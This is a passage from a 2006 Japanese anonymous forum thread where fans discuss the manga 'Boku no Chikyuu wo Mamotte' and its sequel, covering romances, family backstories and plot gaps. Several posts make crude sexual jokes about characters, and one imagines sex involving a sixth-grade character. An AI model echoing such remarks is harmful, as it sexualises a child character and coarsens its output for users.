苺が大吾の勝利を内助の功みたいな感じで褒めてたから、
1〜2年は経ってるのかもしれないけど、
その位だったら出来ないもしくはあえてまだ作らない夫婦はたくさんいるし。

745 :花と名無しさん:2006/09/27(水) 06:12:45 ID:RIclQj+1O
四巻いつでるの?
紫苑燃え

746 :花と名無しさん:2006/09/27(水) 11:00:13 ID:???O
燃えってヒドス
紫苑に恨みでもあるのか?

747 :花と名無しさん:2006/09/27(水) 14:12:29 ID:???0
紫苑はスーパーサイヤ人になったのか?

748 :花と名無しさん:2006/09/27(水) 16:28:08 ID:???0
そんないじめなくてもいいじゃんwwww

749 :花と名無しさん:2006/09/27(水) 17:03:54 ID:???O
正直 リンにチンコが生えてるなんて思えない
ボク月のリンは確かに逝け面だし上半身だけ見ると脱がせたくなる
しかし下半身はトリガラのごとく細いので、チンコ勃起でありすとセックルしてるのを想像しても


エロくない

750 :花と名無しさん:2006/09/27(水) 17:14:24 ID:???0
というか、僕月にちょうど青春真っ只中の年齢のキャラがいないから仕方ないのかもしれないが、
結婚後何年も経ってる日本人夫婦の「チュ」という軽いキスシーンは入れる必要があるのだろうか?
あれすごく気恥ずかしいんだが。
普通に家族愛と子供の友情話だけやって、生々しい恋愛描写は別にいらないのだけど、
やはりリアル読者にはそういうのも少しはないとウケが悪いのかな?

751 :花と名無しさん:2006/09/27(水) 17:35:42 ID:???O
ありすとりんはアメリケンスタイルなんだよきっと


わらしもセックルシーン想像出来ん
木蓮と紫苑のセックルシーンはむちゃくちゃえろそうだけど

不倫セックルのミクロが一番えろかな

752 :花と名無しさん:2006/09/27(水) 18:05:41 ID:???0
倫くんの珍子。

753 :花と名無しさん:2006/09/27(水) 18:08:57 ID:???0
僕月の輪とありすより、僕地球ラストの小六輪と大三ありすの
セックルの方が想像しやすかったりして。
あの時点で輪の方が背が高いらしいし。

754 :花と名無しさん:2006/09/27(水) 18:57:17 ID:???O
小6かー…
早いな…

755 :花と名無しさん:2006/09/27(水) 20:21:40 ID:???0
>>751
亜梨子はきっと人目を避ける為蓮をハワイで出産したんだよ。
そこでアメリケンスタイルになったりして。

小沢真理の「ニコニコ日記」のニコの母親も当時売り出し中の女優だったから
マスコミに騒がれないようハワイでニコを出産したし。
(実在の芸能人にもいたような)

756 :花と名無しさん:2006/09/27(水) 21:25:49 ID:???O
>755
なるほど
確かに日本じゃマスゴミ騒ぎそうだよなあ…
あまりチューチューするのもなんだかなあって思うけど蓮ものびのび育ってるから、まあいーのかな

757 :花と名無しさん:2006/09/27(水) 21:49:47 ID:???0
>>743の青華&大悟で思い出したけど、ラストで突然結婚してたのでびっくりしたよ。
大悟→青華のフラグは初期から立ってたけど、逆はいつから?
唯一覚えてるのが苺と夜子問題で悩んでた青華を大悟が優しく慰めてたシーンだけど、
あれで立ったのか既に付き合ってたのかも不明だし。

そもそも自分の中では彼は外見も性格もパッとせず、
健や野田の引き立て役というイメージが強かったので、
そこそこ可愛いくて性格も良い青華と何のエピもなくくっつけられても説得力がない。
まだ状況的に美夜×義兄のカポーのが納得出来る。

758 :花と名無しさん:2006/09/28(木) 01:03:44 ID:???0
あの状況じゃ、男3人女3人の中で一番平凡な人同士の青華と大悟が惹かれあったか
友人2人がカップルになったので、余った2人が何となく付き合いだした風にしか
考えられないな。

健はモデルのギャラ+小説の印税、野田は数々のバイト(その後会社も創立)
大悟は力士として結婚費用を稼いだだろうけど、麒麟も売れっ子モデルか子役になって
結婚費用を稼いでいると思うな。彼には父親と叔父のコネもある事だし。



759 :花と名無しさん:2006/09/28(木) 04:34:18 ID:???0
>>758
>平凡な人同士
二人だけ前世に絡んでないしね。これで後付けで色々入れられたら萎えたけど。
それにしても、現世で兄弟だと前世でも関連があるっぽいのに、
野田と夜子の兄弟は何もなかったみたいだね。
まあそれ言ったら親も代々関連がなくちゃいけなくなってキリがないけど。

760 :花と名無しさん:2006/09/28(木) 05:06:27 ID:???O
>>749
誤解しているようですが
輪にチンコは生えてないですよ。
異星人だから卵を生みます。

761 :花と名無しさん:2006/09/28(木) 05:58:03 ID:???0
輪♀かよw

762 :花と名無しさん:2006/09/28(木) 11:06:42 ID:???0
キチェスは卵を産むのか。

763 :花と名無しさん:2006/09/28(木) 12:00:16 ID:???0
この場面が好き。
http://zip.2chan.net/8/src/1159412216681.jpg

みんなは僕地でどの場面が好き?

764 :花と名無しさん:2006/09/28(木) 13:58:05 ID:m45WUIfe0
ありすが輪を突き落とすシーンが大好き!(><)

765 :花と名無しさん:2006/09/28(木) 14:03:30 ID:???O
青華が全く思い出せん…コミクス金欠時に売っぱらってしまった〜
聖大好きだったんだけどなぁ

766 :花と名無しさん:2006/09/28(木) 14:41:32 ID:???0
夕焼けすきとおる 水の中のユートピア
いつからここに あなたと居る 何かに導かれ
少しの間 音が 消えてた 
あなたが 今 髪に触れて
胸の奥まで 届いた

月の光が テクノロジーの森を抱く
私の一番 深い場所が
あなたを抱くように 宇宙の風よ
ただれた傷を癒して 地表の端をめくり
息を吹き込んで

あなたのそばに居たい 
ああ たとえ燃え尽きて 死んでも

ああ 限りない ノスタルジア
震えてる あなたの魂を呼ぶ
永遠に 私の声だけが 響く

767 :花と名無しさん:2006/09/28(木) 16:27:29 ID:???0
「亜梨子と同じ年に生まれたかった!」と輪が泣きながら叫ぶ場面が好き。

>>765
コミックカフェか古本屋に行ってみてはどうでしょうか。

>>759
夜子と美夜は因縁がありそうだったけどね。
蛇足だけど大悟は一人っ子と思っていたら兄がいたな。

健父が氷樹母との交際に本気になれなかったのは、もしかしすると氷樹母がゴージャスで勝気な女性
で健父は押しに負けて付き合っていたんじゃいないか?
優柔不断で少し考えが足りない面は否定できないけど、健父は本来真面目で大人しい性格で一目ぼれした
健の母親も温和で地味、優しい感じの女性だったし。氷樹の存在を知らされて健父は初めて氷樹母が本気で自分を
愛してくれていた事を知ったとか。(氷樹は両親の良い面を貰ったんだよ)

768 :花と名無しさん:2006/09/28(木) 17:11:51 ID:???0
>>767
確かに健父はイギリスに留学しててイギリス人の彼女までいたのに、
日本の中学英語すらよく分からない程度の英語力だったのに対し、
氷樹は将来一緒に暮らせる保証なんてない父と弟の為に
子供の頃から日本語の猛勉強をしてペラペラになった位だからなあ。
いくら血を分けた家族もいるとはいえ、運命の相手に出会えそうだからと
長年暮らした故郷を離れて異国に永住する気満々だった所は、
確かにかなりたくましくて情熱的かも。

健父も健母に対してだけは相当情熱的だったのだろうけど、
基本的には受け身で冒険を好まないタイプっぽい。
そう考えると、特に必要もないのに大人になってからもうてなに登りまくる健は、
どちらの血を引いているのだろう?

769 :花と名無しさん:2006/09/28(木) 17:52:01 ID:???O
紫苑がブツブツ言いながら木蓮のおっぱいなめてカクカクするシーンがだいちゅき

770 :花と名無しさん:2006/09/28(木) 18:18:33 ID:???0
>>765
聖はかわいかったねぇ・・・・

771 :花と名無しさん:2006/09/28(木) 20:18:04 ID:???0
聖に会いたくなってきたよ・・・・

>>768
健は父方の祖父母似なんだよ。祖父母が結婚した時は当然今より偏見が強かったから
(子供達の年齢からすると1950年代)国際結婚をした事自体冒険的だよ。

そう考えると麒麟は性格は父似かなとも思うけど、母親の氷樹の時には健父の血で薄められていた
母方の祖母(氷樹の母)の血が強く出てしまった可能性もあるな。だとしたら現在氷樹は麒麟に
振り回されているけど母の生前には母に振り回されていて(氷樹の母親だから根は悪い人じゃなかったけど)
祖母とボブ一家がいたから素直で優しい女性に成長できたのかもね。


772 :花と名無しさん:2006/09/28(木) 20:31:16 ID:???0
ぼく地球のコミックの読者投稿のコーナーで

「私は放送部員なので学校の放送で、輪の詩
(アリス海へいこうってやつ)を朗読しましたv
 そしたらぼく地球を知ってた子と仲良くなれちゃいました!」

というのがあったんだけど、今頃は当時を思い返して恥ずかしさに悶えてるんだろうか

773 :花と名無しさん:2006/09/28(木) 21:30:52 ID:???0
いや、綺麗さっぱり消し去ったかもしれん。

774 :花と名無しさん:2006/09/28(木) 22:06:59 ID:???0
>>767
夜子は本当は自分も泣いたり甘えたりしたいのに、性格上出来ないって感じだったね。
美夜がその辺全く気遣えない子だったのもイラついたな。
やはり前世からそういう一方的な依存というより寄生に近い関係だったのだろうか?

苺や清華はそんな夜子を理解してたっぽいけど、
夜子の方が同じ歳だからかあまり頼らなかったし。
両親は子供を別棟に住まわせる位だから放任だろうし
(再婚だっけ?もしかしてイチャつくのを邪魔されたくないから?)、
義兄は美夜べったりだし。

当時の精神を病む前の氷樹なら夜子のいい姉代わりになって甘えさせてくれただろうけど。
そういう意味では、夜子は結婚はともかく高校時代は健と付き合った方が幸せだったかも。

775 :花と名無しさん:2006/09/29(金) 06:44:28 ID:???0
>>771
健母の家系は思い切り保守的っぽいよね。外国人に対する偏見もあるみたいだし。
健父が浮気をした訳ではないのに、氷樹の存在もなかなか受け入れなかったし。
同居を始めてからは出て来てないけど、ずっと面白くは思ってなさそう。
健母は氷樹の気持ちを思いやる優しさのが勝ったってだけで。

あれは「結婚もしてないのに子供なんか作って」って点でも許せなかったのかな?
仮に結婚してて離婚後に元妻がこっそり子供を生んだって設定だったとしても、
「若くして即結婚・離婚する男なんて信用出来ない」とか、
「離婚直前までやる事やってた男なんて(ry」とか難癖付けられてたのだろうか?

776 :花と名無しさん:2006/09/29(金) 07:03:50 ID:???0
ぼくたまのどうしても理解出来ない点
もくれんがヤられちゃってるのに、でかでかとハレルヤって
書いてあった点・・・・

777 :花と名無しさん:2006/09/29(金) 09:42:22 ID:???0
あれは、「Oh,my God...」「Oh,Jesus...」みたいなものじゃないの?

778 :花と名無しさん:2006/09/29(金) 10:15:09 ID:???0
単なる紫苑の皮肉

779 :花と名無しさん:2006/09/29(金) 11:05:55 ID:???0
>>776
実はあの時やっぱり受胎してて、自然流産しちゃったんだよ。
そういや木蓮たちってサイズが小さい分、やはり妊娠期間も短いのだろうか?
そして指サイズ人間のさらに赤ちゃんなんて、地球人の指の上にも乗りそうだ。
もはや虫。だから間違えて落としちゃっても死ななそうなイメージ。

780 :花と名無しさん:2006/09/29(金) 11:23:05 ID:???O
森の子山羊を歌いながら、画面に血しぶきが飛び回っているシーンが好き
あと一気に桜が開花するシーンも印象深い

久しぶりに僕たまを読み返したら、日渡さんの漫画って映像的だなと感じた

781 :花と名無しさん:2006/09/29(金) 13:36:43 ID:???0
>>775
それは難癖というか、まともな人間なら誰しも思うことだと思うが。

782 :花と名無しさん:2006/09/29(金) 13:47:41 ID:???0
紫苑の皮肉なら理解出来るかも。
おーまいがっだったら「サージャリム様」とか、ぼくタマ系単語の方がヨカタ。

783 :花と名無しさん:2006/09/29(金) 14:17:53 ID:???0
やった!とか万歳!とかそういう感じにとらえてた。>ハレルヤ
ああ、やってやったぜ神よ!どうだよ!みたいな感じ?

784 :花と名無しさん:2006/09/29(金) 16:05:18 ID:???O
蓮がどうにも可愛くなくて魅力ないので僕月面白くない。
せめてもっと変わったこどものがいいな

785 :花と名無しさん:2006/09/29(金) 16:14:45 ID:???0
となると、紫苑は「ほらほら最後のキチェスとやってますよ〜☆」と
最中を誰かに目撃させたかったのか。

・・・・・彼にそういう趣味があったとはっ(違うかw

786 :花と名無しさん:2006/09/29(金) 16:23:18 ID:???0
>>785
さすがにそこまでの趣味はないだろうw
紫苑の予定としては事が終わり、キチェが消えた木蓮の肩でも抱きながら
「どうだ!!」とみんな(特に玉)に見せびらかすつもりだったんじゃ?

だけど実際はキチェは消えないから、誰かに最中を目撃させ、
木蓮に騙されたショックで寝込ませる必要があった。
木蓮が平然としたままでキチェも消えなかったら、
黙ってれば誰にも分からないのだしね。
紫苑がいくら言ったって証拠はないし。

787 :花と名無しさん:2006/09/29(金) 17:38:19 ID:???0
>>775>>781
伯母さんは妹の夫がハーフという事自体気に入らないみたいだもの。
その場面は日渡さんがスルーしているだけで、氷樹の事もいじめていそうだよ。

実は氷樹が心を病んでしまったのは麒麟のせいだけではなく、伯母さんからの
イジメも原因の1つだったんじゃないかな。苺がその事を話題に出していないのは
自分は「最愛の甥のお嫁さん」として伯母さんに娘共々可愛がられていたので
言いづらかったんじゃないかな?


788 :花と名無しさん:2006/09/29(金) 19:51:19 ID:HJa6rBJX0
アニメ版を見て、「この話すごいなー、絵も綺麗だしー」「でも話が途中で終わってるみたいだから、よーし原作買うかー」
で、買いはじめた単行本…。20巻ぐらいあるから、そりゃーもう、アニメ以上にきっと壮大な話なんだろなーなんて、勝手に思ってて。
最後まで読んで「そういえば…これって、少女漫画だもんね。男女7人物語みたいだなあとか、文句いっちゃだめだよね」って
何度、自分に言い聞かせたことか…。懺悔、後悔、懺悔、後悔、懺悔、懺悔、後悔。よく話つづけれたもんだなあ。


789 :花と名無しさん:2006/09/29(金) 21:26:39 ID:???0
少女漫画に恋愛以外のものを期待してはいかんよ

790 :花と名無しさん:2006/09/29(金) 21:51:35 ID:???0
仮に紫苑と玉蘭の立場が逆だったとして、
木蓮は玉蘭と寝られるのか?って事を考えると、
純潔を捧げたのに相手は愛してくれてなかったと
来世までウジウジ悩まなくても良かったんじゃ。
(玉蘭は性格上あんな交換条件は出さないだろうけど)

木蓮自身は周囲が思うほどキチェには思い入れがなかったのだし、
初めてが本気で愛した相手だっただけでも良かったじゃないか。
振り向いてくれないのが分かってても玉蘭を誘って思いを遂げた
エンジュの立場を考えると、木蓮の悩みってかなり贅沢だったんじゃ?

791 :花と名無しさん:2006/09/29(金) 22:40:41 ID:???O
紫苑と槐の絡みはかなり好きだったな
普通に上手くいくカップルになるだろーなと思っていた記憶がある
表紙とかで紫苑と木蓮プッシュとかがなければずっとw
今考えても私的に勿体ないな〜
槐なら静かに優しく紫苑の心と向き合って、ひたむきな愛を注いでくれそうだし
紫苑は真から愛されることで愛することが出来て、そのひたむきさにキュンとw満たされそうだったな
槐の心情は玉好き以外あまり描かれなかったからわからないけど、
紫苑は槐みたいな苦しみを耐える姿や、にじみ出るような優しさと情熱を持つ人ってタイプだったんじゃないかと感じたよ
はいはい妄想妄想w

792 :花と名無しさん:2006/09/30(土) 00:13:31 ID:???O
>>791当時同じようなこと感じてたよ。
もし玉と木蓮がいなかったら、エンジュと紫苑はほのぼのカップルになってたかもね。
ところで、もし紫苑と玉のどちらかが女性に転生してたら、この2人どうなっただろう。
激しく反発しながらも惹かれあっていたから、異性同士になったらすんなりくっついてしまいそうだ。
ありすも一成も、太刀打ちできないと思う‥。

793 :花と名無しさん:2006/09/30(土) 00:34:36 ID:???0
エンジュとシオンはお互いがお互いのことをカケラも気にしていなかっただろうから
何か特別なことがない限りそもそもお互いを視界に入れることすらないだろう。
まして嫌われ者だったシオンに対しては、ジュスランとギョクランががっちりガードして
近づけさせなかったんじゃない?
ある意味では、シオンとモクレンのカップルは、どちらもあの7人の中では微妙に浮いていたわけだ。
仕事もあまりできないモクレンに対する感情も、主に女性陣で嫉妬交じりに悪化していってただろうし。

794 :花と名無しさん:2006/09/30(土) 04:37:42 ID:???0
>>792
紫苑と玉のどっちかが女性になってたらの仮説想像してみた。
凄い!!いわゆる反発しつつ惹かれあう、少女漫画の典型じゃないか!!
「玉砕覚悟です・・」の彼女(名前が出てこない)あたりが
ちょっと邪魔な意地悪な女の子で、みたいな。

795 :花と名無しさん:2006/09/30(土) 05:41:26 ID:???O
なんだっけ、名前が出てこないけど確か
セコくてコスい女の子だよね?

796 :花と名無しさん:2006/09/30(土) 09:00:21 ID:???0
>>793
>シオンとモクレンのカップルは、どちらもあの7人の中では微妙に浮いていたわけだ。

蚊帳の外って意味では、柊とシュスランも浮いてたよね。
二人だけサーチェスを全く持たない、恋愛のドロドロにも絡まない。
秋も直接絡んだのは三人残ってからのワクチン関係だけだけど、
それ以前にも木蓮と茶飲み友達で二人で仲良くしてたのに対し、
柊はそれすらなさそうなので。

797 :花と名無しさん:2006/09/30(土) 10:18:33 ID:???0
>>795
ココって女でしょ?

798 :花と名無しさん:2006/09/30(土) 11:30:11 ID:???0
玉蘭はそれほどでもなかったけど、紫苑の玉蘭への
構ってチャンっぷりは今思えば凄まじかったな

799 :花と名無しさん:2006/09/30(土) 12:50:56 ID:???0
紫苑は玉と木蓮をソックリだと言っていたから、もしも
木蓮が男だとしたら玉と同じような関係になってんだろうな。
結局、紫苑が玉や木蓮に突っかかって粘着構ってチャンしてたのは
「幸せそうで楽しそうで容姿も出身も何もかも恵まれている
こいつらからなら、キスやハグをわけてもらえるかもしれない」
ということを心の底で望んでたからってことでおk?

800 :花と名無しさん:2006/09/30(土) 13:56:14 ID:???0
>>774
子供達の為に別邸まで作っているのだから、放任主義だけではなく裕福なんじゃないの?>遠坂家
夜子と美夜の父親が会社の社長とかだったら「早く義兄を正式に自分の後継者に迎えたい」考えて
義兄とまだ高校生の美夜の婚約を認めても、それほど不自然ではないよ。

氷樹の家系も裕福そうだな。
ボブの「日本の家族と一緒に住んで、ミソスープを作っている様子を
想像するだけでも胃に穴があく」という台詞が引っかかったんだよ。
使用人を雇っているぐらい財力のある(=わざわざ自分で炊事なんてしなくていい)
家系じゃないかな?
(単にボブが日本が嫌いで感情的になっていたからかも知れないけど)






801 :花と名無しさん:2006/09/30(土) 14:12:41 ID:???0
いや、そこは「いつもは召使なりがいて自分で炊事もしなくていいはずの
氷樹が日本の家で料理を作っている様子を想像したくない」という意味じゃなく、
単純に氷樹が(ボブにとっては余りイメージが良くなさそうな)日本の代表料理の
ミソシルを、日本に住んで作ってるのを想像したくないってことだろ


802 :花と名無しさん:2006/09/30(土) 14:18:05 ID:???0
だろうね。
自分の大切な人が自分にとってはイメージのあまり良くない国へ
いくって話を聞いたら、「お前がインドでカレー作ってる姿なんて
想像したくない(例えでインドにしただけでインド嫌いではない)」
と言いたくなってしまう気持ちは分からないでもないかな。

803 :花と名無しさん:2006/10/01(日) 00:28:16 ID:???0
>>799
典型的な一匹狼気取りの心理という奴だな。

804 :花と名無しさん:2006/10/01(日) 02:51:36 ID:???0
>>799
逆に紫苑くらい屈折してたら、「幸せな奴らに俺の気持ちなんか分かりっこない。
そんな奴らにおこぼれをもらうなんてまっぴらだ」と関わらなさそうなんだけどなあ。
例えば自分と同じ位恵まれてない戦災孤児に出会えたら、紫苑はどういう対応をしたのだろう?
キチェスと知り合うよりそちらの方が明らかに確率高そうなのに。

805 :花と名無しさん:2006/10/01(日) 04:53:36 ID:???O
最初は>>804みたいに思ってたケド、
ラズロに出会ってからキスの存在性を知って
恵まれた環境の人を羨んだり自分も欲しいと
(キスをあげると言ってくれた本人が死んだから特に)
感じるようになったて解釈してた。

相手にもよるが紫苑は実力主義っぽいからなー>対戦争孤児
露骨に恵まれた人を僻んでる場合、努力しろよとか言いそう

…長文スマソ

806 :花と名無しさん:2006/10/01(日) 11:52:06 ID:???O
ぼく地球名場面をひとつだけ選べって言われたら?

パパが死んだあと木蓮に「愛してるわ」って言うママのところに一票。

807 :花と名無しさん:2006/10/01(日) 13:54:12 ID:???0
木蓮ママもあの後他界したけど、過酷な逃亡生活で体を壊してしまったのかな。

>>774
確か義兄は両親を亡くして夜子と美夜の家に引き取られた子で、遠坂夫妻は再婚カップルではないよ。

>>801>>802
ボブはあれだけ日本を嫌っているのだから、普通純奈の存在も承知しないはずだけどな。
あと健父とボブの親は連絡を取り合っていたけど、健父が会話は何とかできるけど
読み書きがイマイチみたいだったから、手紙の方はどうしていたんだろう。


808 :花と名無しさん:2006/10/01(日) 15:43:22 ID:???0
>>807
当時はまだ幼い娘を一人残して逝ってしまうなんてヤワだなあと思ってたけど、
その幼かった木蓮はピンピンしてたんだよね。
自分が衰弱しても娘だけは健康に育てたいという親の愛情は相当なもんだったんだね。

ありがとう。それなら>>800が言うように両親が義兄と美夜を
早く結婚させたかったかもしれないのも納得。

ボブはもともと日本に対してあまりいい印象はなかったのだろうけど、
それよりも親戚の叔母と深い付き合いをしたくせに、
帰国したらそのまま連絡も取らず当然子供が出来た事も知らずに
のうのうと他の女性と結婚した健父が嫌いなのでは?
だから純菜の事はそれ程嫌いじゃなかったのかも。
氷樹が隠れて会ってた可能性もあるけど。

809 :花と名無しさん:2006/10/01(日) 16:22:41 ID:???0
>>800>>807の意見を合わせた推測だけど、

遠坂夫妻は夜子たちの義兄を養子ではなく婿として自分の跡継ぎにしたかった →
じゃあとりあえず既成事実を作らせよう →
思春期になったら子供達だけで一緒に住ませたらその気になるのでは?

という流れだったらチョト怖かったり。

810 :花と名無しさん:2006/10/01(日) 23:24:23 ID:???O
>>4の蓮は水子って〜の蓮って誰ですか?
今日初めて全巻読んだんですが、わからないのでどなたか教えて下さい。
よろしくお願いします。

811 :810:2006/10/01(日) 23:27:31 ID:???O
もしかして、ぼくたまの話ではないのでしょうか?

812 :花と名無しさん:2006/10/01(日) 23:28:43 ID:???0
○○君(義兄の名前)が将来夜子か美夜と結婚して跡継ぎになってくれたらいいな→
美夜と相思相愛だって!?渡りに船だ━━━━━(゚∀゚)━━━━━ッ

であってほしい。

「氷樹」の名前は物語の流れからしたら母親が付けたとしか考えられないな。
健父もそれほど英語が上達しなかったみたいだから、本当は氷樹母も日本語に堪能だった可能性があるな。
それで健父も自分の好みのタイプじゃない(と思われる)氷樹母と付き合っていたのかもね。

氷樹の名前の由来で考え付いたパターンは

1.健父に見せてもらった樹氷の写真が美しく記憶に残ったから。
2.実は氷樹母は日本からの帰国子女or日本への家族旅行の経験が有った。
 少女時代観光名所の蔵王の樹氷を見に行って感動した思い出があり、
 健父ともその話題で 盛り上がった。
3.健父と一緒に実際に樹氷を見に行って思い出に残ったから。
4.日渡さんがそこまで考えていない。
おまけ
5.知り合いの日本人に頼んで付けてもらった。

何より自分のルーツに誇りを持って欲しいという氷樹母のたっての願いがあったからだけどね。

813 :810、811:2006/10/01(日) 23:53:52 ID:???O
理解しました。
本当にすみませんでした。
スルーして下さい。

814 :花と名無しさん:2006/10/02(月) 01:02:20 ID:???0
ぼく球の画集、友達に借りパクされたの思い出した・・・木蓮と紫苑が抱き合って笑ってるやつ
もう一度見たいなあ

815 :花と名無しさん:2006/10/02(月) 02:54:14 ID:???0
>>804
口ではそんなことを言ってても、内心は違うよってことだろう。
むしろ、関わらないと思い切って、それなりの対応を取れるほどの一徹者だったら
シオンも逆説的に幸せになれたかもしれない。

816 :花と名無しさん:2006/10/02(月) 10:37:57 ID:???0
友人に貸したまま手元にないので教えて下さい
モクレンが階段から落ちて気絶して地球の夢?を見て、
帰ってからシオンに「おでん作るの」とか言ってたシーンは
シュウはまだ生きてましたか?
発病してからだったような気もするし、シュウが後ろで覗き見してたような気も…

817 :花と名無しさん:2006/10/02(月) 13:47:42 ID:???0
うちも手元にコミクスないけど、みんな氏んで二人きりになった時じゃなかったっけ。

818 :花と名無しさん:2006/10/02(月) 20:35:01 ID:???0
>>816
「おでん作るの」発言は発病後です(19巻参照)
この時の木蓮は束ねただけの髪型で
「私たちここから地球を見守って…」の台詞
紫苑が後ろから抱きしめる

秋が覗き見していた時(14巻参照)は
木蓮の髪型はまとめ髪で
「どちらが先に死ぬ事になっても〜中略〜地球を見守ること…」
紫苑は肩を抱き寄せながら横抱き→チュー寸前

…でした。
久々に見返したら
今まで紫苑と木蓮はレイプの一回だけ派だったんだけど
あそこでチューしてるって事はそれなり二人はヤッてた?
と、思うようになってしまった…。


819 :花と名無しさん:2006/10/02(月) 21:25:27 ID:???0
最終的にかなり仲良く暮らしていてそれなりに情が
通ってる様に見えるのに、傷つける為の一回限りで
あそこまで「愛されてない」と信じ込むかなと思ったので、
それなりにやってた派
それでもなおキチェは消えなかったからって事なら納得できる

820 :花と名無しさん:2006/10/02(月) 22:17:48 ID:???0
つうか、キチェが消えなかったことが一番納得いってない。
『神に選ばれたキチェスだから』って言われても…じゃあ父母の悲劇や掟とかに縛られてる
他のキチェスの立場は…選ばれてない一般人は引き立て役しとけって感じか?と。

少し前にモクレンの性格が嫌いって意見が出まくってたけど、
私の場合、モクレンは性格が悪いのにモテモテで恵まれまくってて、だから嫌い
ってことではなくて、性格がどうとかはいいんだけど
最終的に、「木蓮・紫苑は選ばれた人間」だから奇跡でも何でもアリですって結論になったのが嫌だった。
=木蓮・紫苑の生まれ変わりのありす&輪も選ばれた人間なのでモテモテ天才マンセー。
一般人はこの二人を褒め讃えとけ。って世界観が受け入れられない…

821 :花と名無しさん:2006/10/02(月) 22:58:48 ID:???0
ありすも最初は内気で平凡な高校生だったのにねえ。
周囲との感覚のずれを自分でどうすることもできず戸惑ったり。
家族もそんなありすを家族として当たり前に理解してる感じがよかった。

成長を描くこととマンセーするのとは別だよなあ・・・

822 :花と名無しさん:2006/10/02(月) 23:17:30 ID:???0
そうなんだよ、例の最終回以降、続編に至るまで
一番納得いかないのはそこなんだ。

歌姫だモテモテセレブだのとマンセーされるんじゃなくて、
本人が昔から気にしてた内気さや引っ込み思案を
克服するイベントや描写が必要なんではなかったのか。
輪にしてもピアノだ株だ溢れる才能がどうたらより
人間的に成長した姿を描くべきだった。

823 :花と名無しさん:2006/10/03(火) 00:08:39 ID:???0
>>818
ありがとう!
すっきりしました( ´∀`)

824 :花と名無しさん:2006/10/03(火) 23:40:32 ID:???0
>>822
亜梨子が唐突に「チャイコフスキーコンクールに出場」
していたのは目をつぶるとしても
輪が何の前触れもなくショパンコンクールに出場と言われてもね。
そこまでに至る場面が描かれていなくて、ただ亜梨子が説明しているだけだから
戸惑うだけだよ。


825 :花と名無しさん:2006/10/04(水) 01:42:46 ID:???0
シオンにも音楽の才能あったっけ?

826 :花と名無しさん:2006/10/04(水) 02:48:36 ID:???0
実家を出て暮らしている間に
ぼく地球のOVAを勝手に弟に持ち出され
他人に貸し紛失させられましたorz

827 :花と名無しさん:2006/10/04(水) 07:59:47 ID:???0
>>824-825
輪も一応小二からピアノを習ってたからそれで才能が開花したって事なんだろうけど。
他のメンバーが天才と言えるレベルの才能はみんな前世から引き継いだものなんだから、
紫苑にもそういう描写が欲しかったよね。
紫苑が仕事の合間にキーボード弾いてそれに聞きほれた木蓮がつい歌ってしまい…みたいな。

828 :花と名無しさん:2006/10/04(水) 10:00:23 ID:???0
音楽の才能は輪固有のものなんじゃないかな。
輪のママも合唱をやっていたし、小林家の家系的に音楽一家って感じで。
紫苑として生きていたころは散々否定してきた木蓮の歌に
輪としては歩み寄るようにありすと音楽を楽しんでいる。という変化と思ったり。
まぁさすがにショパンやらチャイコフスキーとかのコンクールまで行くと
大風呂敷広げすぎだとは思うけど。
そこまでマンセーしなくてもピアノを弾く輪とそれに合わせ歌うありす。笑顔の二人。
みたいな音楽を楽しんでいるささやかな描写でも良さそうだったけどね。

829 :花と名無しさん:2006/10/04(水) 11:35:33 ID:???0
輪だけ前世からの能力はほぼ全て引き継ぎ、その上転生後のDNAの才能まで手に入れるなんて…。
どれだけ輪マンセーなんだよorz
一成も桜も前世は大学院卒で学者になった位なんだから相当頭いいはずなのに、
現世ではそういう描写全くなかったし。

ちなみに木蓮の動物と紫苑のエンジニアと柊の言語と秋の医者くらいしか覚えてないのだけど、
あとの三人は何の学者(担当)だっけ?

830 :花と名無しさん:2006/10/04(水) 15:00:43 ID:???0
>>827
そのエピいいなぁ。
ついつい紫苑もいい気分になってしまってノリノリになってしまうとか、
まわりのみんなも聞き惚れるとか、いっそ踊っちゃうとかw

831 :花と名無しさん:2006/10/04(水) 15:35:54 ID:???0
>>829
コミックのキャラ紹介によると

エンジュ→古生物学者
玉→考古学者

と書いてあった。シュスランは何も専攻について
書かれてなかったんだけど、エンジュと親友ってことで同じ古生物学者なのかな

832 :花と名無しさん:2006/10/04(水) 15:41:42 ID:???0
>>830
その場合は全員文句言わずに草むしりやらざるをえないだろうねw

>>831
サンクス。
やっぱり迅八と一成が歴史や古代に詳しかったり興味あるって描写はないよね?
一話冒頭の恐竜がなぜ滅びたかの話は一成にさせても良かったかも。

833 :花と名無しさん:2006/10/04(水) 17:58:31 ID:???O
蓮がキチェスなら蓮は短命?

834 :花と名無しさん:2006/10/04(水) 18:21:26 ID:???0
蓮のキチェって蓮固有のものではなく、
木蓮の能力を一時的に借りてるだけじゃないの?
蓮固有の能力は今の所サイコメトリーだけでは?
それにしたってどうして蓮にそんな能力が芽生えたのか疑問だけど。

地球産のESPは遺伝的要素があるのだろうけど、
輪とありすのESPは前世の異星人だった自分の能力を引き継いでるだけなのになあ。
日渡さんその辺の設定はどうでもいいと思ってそう。
もしくは地球人に転生した事によって遺伝的要素も加わったって事だと、
迅八・一成・春の子供もそうしなきゃいけないから、彼らに子供を作らせないとか。

835 :花と名無しさん:2006/10/04(水) 18:23:36 ID:???0
蓮はイタコなのだ!

836 :花と名無しさん:2006/10/04(水) 19:00:37 ID:???O
ボク月、第一話で蓮を京都に連れて行ったのは春ですよね?
ぼくしかつれてこられないでしょ
みたいな台詞があるという事はテレポートで連れて来たという事。
でも第二話で、春は最近テレポートできないって言っていました。
第一話と第二話ではそんなに開きがあるのでしょうか?
蓮の学年は変わっていないようですが。

837 :花と名無しさん:2006/10/04(水) 19:07:36 ID:???0
>>836
春は第1話でテレポートを使った時、体に負担がかかりすぎて
持病の心臓病が悪化したから、それで「テレポートが出来ない」と
言ったのではないかな?

>>828
>ピアノを弾く蓮とそれに合わせ歌う亜梨子

まるでLe Coupleだな>亜梨子と輪

838 :花と名無しさん:2006/10/05(木) 11:55:39 ID:???0
作家は時間的に余裕があるから普通に交通機関で連れて来たんだと思うよ。

839 :花と名無しさん:2006/10/05(木) 12:20:49 ID:???0
>>834
蓮は前世で紫苑と木蓮の水子という設定。
サイコメトリーは異星人として備わっていた筈の能力では。

840 :花と名無しさん:2006/10/05(木) 12:34:24 ID:???0
水子と断定する台詞とか何かあったっけ?

841 :花と名無しさん:2006/10/05(木) 12:34:27 ID:???0
水子じゃないよ。
木蓮が妊娠していた可能性があるってだけで堕胎や流産はしてないはずだよ。

842 :花と名無しさん:2006/10/05(木) 15:25:52 ID:???0
>>841
